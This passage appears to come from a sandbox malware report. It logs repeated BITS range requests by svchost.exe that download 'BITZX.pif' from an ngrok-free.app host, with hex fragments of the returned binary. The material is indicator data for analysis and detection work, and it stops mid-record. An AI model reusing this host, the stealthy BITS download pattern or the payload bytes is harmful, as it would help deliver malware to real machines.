        2024-12-16 16:44:19 UTC356INData Raw: 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00
        Data Ascii: **0**0**0***.(C(9***0**0*.(C(9***0***.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        95192.168.11.20498093.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:21 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=23938-24148
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:21 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 211
        Content-Range: bytes 23938-24148/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:20 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:21 UTC211INData Raw: 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 25 0f 00 00 a1 0d 00 00 c6 1c 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 7e 0d 00 00 76 1a 00 00 f4 27 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 74 0a 00 00 2d 1e 00 00 a1 28 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 88 00 00 00 c6 28 00 00 4e 29 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 43
        Data Ascii: C(9***0*Ad%}~v't-((N)~-0*.(C(9***0*AdC


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        96192.168.11.20498103.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:24 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=24149-24347
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:25 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 199
        Content-Range: bytes 24149-24347/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:24 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:25 UTC199INData Raw: 08 00 00 fe 0c 00 00 41 15 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 01 06 00 00 90 19 00 00 91 1f 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 1b 03 00 00 23 1d 00 00 3e 20 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 47 00 00 00 a4 20 00 00 eb 20 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00
        Data Ascii: A#> G -0*.(C(9***0**.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        97192.168.11.20498113.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:27 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=24348-24471
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:28 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 124
        Content-Range: bytes 24348-24471/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:28 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:28 UTC124INData Raw: 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 d0 0b 00 00 da 09 00 00
        Data Ascii: **.(C(9***0**.(C(9***0*AL


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        98192.168.11.20498123.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:30 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=24472-24932
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:31 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 461
        Content-Range: bytes 24472-24932/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:31 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:31 UTC461INData Raw: aa 15 00 00 9a 00 00 00 00 00 00 00 02 00 00 00 1c 09 00 00 28 0d 00 00 44 16 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00 82 16 00 00 de 16 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 9b 0c 00 00 f4 06 00 00 8f 13 00 00 b1 00 00 00 00 00 00 00 02 00 00 00 71 09 00 00 cf 0a 00 00 40 14 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 34 00 00 00 a6 14 00 00 da 14 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00
        Data Ascii: (D\-0*.(C(9***0*ALq@4-0*.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        99192.168.11.20498133.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:32 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=24933-25123
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:33 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 191
        Content-Range: bytes 24933-25123/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:32 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:33 UTC191INData Raw: 00 00 00 00 00 00 00 02 00 00 00 bf 25 00 00 69 08 00 00 28 2e 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 15 23 00 00 d3 0c 00 00 e8 2f 00 00 94 00 00 00 00 00 00 00 02 00 00 00 2c 1d 00 00 38 03 00 00 64 20 00 00 a7 00 00 00 00 00 00 00 02 00 00 00 8e 1a 00 00 c0 07 00 00 4e 22 00 00 bc 00 00 00 00 00 00 00 02 00 00 00 00 4f 00 00 d1 00 00 00 d1 4f 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 ac 48 00 00 06 01 00 00 b2 49 00 00 90 00 00 00 00 00 00 00 02 00 00 00 51 44 00 00 72 0e 00 00 c3 52 00 00 90 00 00 00 00 00 00 00 02 00 00 00 a3 15 00 00 6e 43 00 00 11 59 00 00
        Data Ascii: %i(.}#/,8d N"OOHIQDrRnCY


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        100192.168.11.20498143.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:35 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=25124-25628
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:36 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 505
        Content-Range: bytes 25124-25628/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:35 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:36 UTC505INData Raw: 85 00 00 00 00 00 00 00 02 00 00 00 60 0b 00 00 36 4e 00 00 96 59 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 73 00 00 00 d0 59 00 00 43 5a 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 00 00 00 00 88 00 00 00 73 0c 00 00 fb 0c 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 3c 01 00 02 00 00 00 aa 16 00 00 a7 00 00 00 51 17 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 73 1b 00 00 d1 00 00 00 44 1c 00 00 90 00 00 00 00 00 00
        Data Ascii: `6NYsYCZ-0*.(C(9***0*As~-0*.(C(9***0*A<QsD


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        101192.168.11.20498153.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:38 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=25629-25726
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:39 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 98
        Content-Range: bytes 25629-25726/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:38 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:39 UTC98INData Raw: 51 00 00 2f 52 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 54 01 00 02 00 00 00 4a 3a 00 00 bc 00 00 00 06 3b 00 00 92 00 00
        Data Ascii: Q/R~-0*.(C(9***0*ATJ:;


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        102192.168.11.20498163.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:41 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=25727-26010
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:42 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 284
        Content-Range: bytes 25727-26010/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:42 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:42 UTC284INData Raw: 00 00 00 00 00 02 00 00 00 ef 38 00 00 a7 00 00 00 96 39 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 0c 3c 00 00 dc 00 00 00 e8 3c 00 00 cd 00 00 00 00 00 00 00 02 00 00 00 51 36 00 00 35 08 00 00 86 3e 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 90 35 00 00 ab 0c 00 00 3b 42 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 67 2d 00 00 57 03 00 00 be 30 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 4b 2a 00 00 ca 07 00 00 15 32 00 00 ba 00 00 00 00 00 00 00 02 00 00 00 f2 1a 00 00 c0 00 00 00 b2 1b 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 99 1c 00 00 0a 01 00 00 a3 1d 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 c0 14 00 00 43 0f 00 00 03 24 00 00 92 00 00 00 00 00 00 00 02 00 00 00 d2 10 00 00 37 3a 00 00 09 4b 00 00 90 00 00 00 00 00 00 00 02 00 00 00 ab 0c 00 00 13 46
        Data Ascii: 89<<Q65>}5;Bg-W0}K*2C$7:KF


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        103192.168.11.20498173.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:43 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26011-26211
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:44 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 201
        Content-Range: bytes 26011-26211/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:43 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:44 UTC201INData Raw: 00 c2 00 00 00 00 00 00 00 00 00 00 00 4b 00 00 00 e2 53 00 00 2d 54 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 54 01 00 02 00 00 00 e4 29 00 00 bc 00 00 00 a0 2a 00 00 cd 00 00 00 00 00 00 00 02 00 00 00 d4 26 00 00 bc 00 00 00 90 27 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 8d 2b 00 00 f1 00 00 00 7e 2c 00 00 92 00 00 00 00 00 00 00 02 00 00 00 bf 25 00 00 ef 07 00 00 ae 2d 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 3d 25 00 00
        Data Ascii: KS-T~-0*.(C(9***0*AT)*&'}+~,%-}=%


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        104192.168.11.20498183.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:45 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26212-26216
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:46 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 5
        Content-Range: bytes 26212-26216/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:45 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:46 UTC5INData Raw: 12 0c 00 00 4f
        Data Ascii: O


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        105192.168.11.20498193.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:48 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26217-26349
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:49 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 133
        Content-Range: bytes 26217-26349/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:48 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:49 UTC133INData Raw: 31 00 00 92 00 00 00 00 00 00 00 02 00 00 00 8d 18 00 00 64 03 00 00 f1 1b 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 ea 14 00 00 e3 07 00 00 cd 1c 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 61 3a 00 00 c0 00 00 00 21 3b 00 00 90 00 00 00 00 00 00 00 02 00 00 00 45 3c 00 00 06 01 00 00 4b 3d 00 00 7d 00 00 00 00 00 00 00 02 00 00 00 b7 33 00 00 db 0e 00 00 92 42 00 00 a3 00 00 00 00 00 00 00 02 00
        Data Ascii: 1d}a:!;E<K=}3B


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        106192.168.11.20498203.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:53 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26350-26568
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:53 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 219
        Content-Range: bytes 26350-26568/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:52 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:53 UTC219INData Raw: 00 00 02 0c 00 00 35 38 00 00 37 44 00 00 a5 00 00 00 00 00 00 00 02 00 00 00 45 06 00 00 3b 44 00 00 80 4a 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 28 03 00 00 05 48 00 00 2d 4b 00 00 b3 00 00 00 00 00 00 00 00 00 00 00 5b 00 00 00 85 4b 00 00 e0 4b 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 3c 01 00 02 00 00 00 0b 4d 00 00 a7 00 00 00 b2 4d 00 00 81 00 00 00 00 00 00 00 02 00 00 00 a3 51 00 00 bc 00 00 00 5f 52 00 00 92 00 00 00 00 00 00 00 02 00 00 00 3f 4f 00 00 f1 00 00 00 30
        Data Ascii: 587DE;DJ(H-K[KK~-0*.(C(9***0*A<MMQ_R?O0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        107192.168.11.20498213.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:56 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26569-26692
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:56 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 124
        Content-Range: bytes 26569-26692/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:56 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:56 UTC124INData Raw: 50 00 00 a9 00 00 00 00 00 00 00 02 00 00 00 11 4c 00 00 ab 07 00 00 bc 53 00 00 cd 00 00 00 00 00 00 00 02 00 00 00 63 4a 00 00 36 0c 00 00 99 56 00 00 92 00 00 00 00 00 00 00 02 00 00 00 56 30 00 00 3d 03 00 00 93 33 00 00 bc 00 00 00 00 00 00 00 02 00 00 00 1d 2e 00 00 35 08 00 00 52 36 00 00 ba 00 00 00 00 00 00 00 02 00 00 00 db 1d 00 00 bc 00 00 00 97 1e 00 00 90
        Data Ascii: PLScJ6VV0=3.5R6


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        108192.168.11.20498223.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:44:59 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26693-26829
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:44:59 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 137
        Content-Range: bytes 26693-26829/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:44:58 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:44:59 UTC137INData Raw: 00 00 00 00 00 00 00 02 00 00 00 c2 27 00 00 06 01 00 00 c8 28 00 00 e2 00 00 00 00 00 00 00 02 00 00 00 23 1b 00 00 64 0f 00 00 87 2a 00 00 b8 00 00 00 00 00 00 00 02 00 00 00 00 16 00 00 96 46 00 00 96 5c 00 00 ab 00 00 00 00 00 00 00 02 00 00 00 3b 0c 00 00 06 51 00 00 41 5d 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00 92 5d 00 00 ee 5d 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00
        Data Ascii: '(#d*F\;QA]\]]~-0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        109192.168.11.20498233.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:02 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26830-26948
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:02 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 119
        Content-Range: bytes 26830-26948/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:02 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:02 UTC119INData Raw: 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5
        Data Ascii: *.(C(9***0**.(C(9***0**.(C(9


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        110192.168.11.20498243.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:05 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=26949-27430
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:05 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 482
        Content-Range: bytes 26949-27430/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:04 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:05 UTC482INData Raw: 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5
        Data Ascii: ***0**.(C(9***0**.(C(9***0**.(C(9***0**.(C(9***0**.(C


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        111192.168.11.20498253.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:07 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=27431-27464
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:07 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 34
        Content-Range: bytes 27431-27464/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:07 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
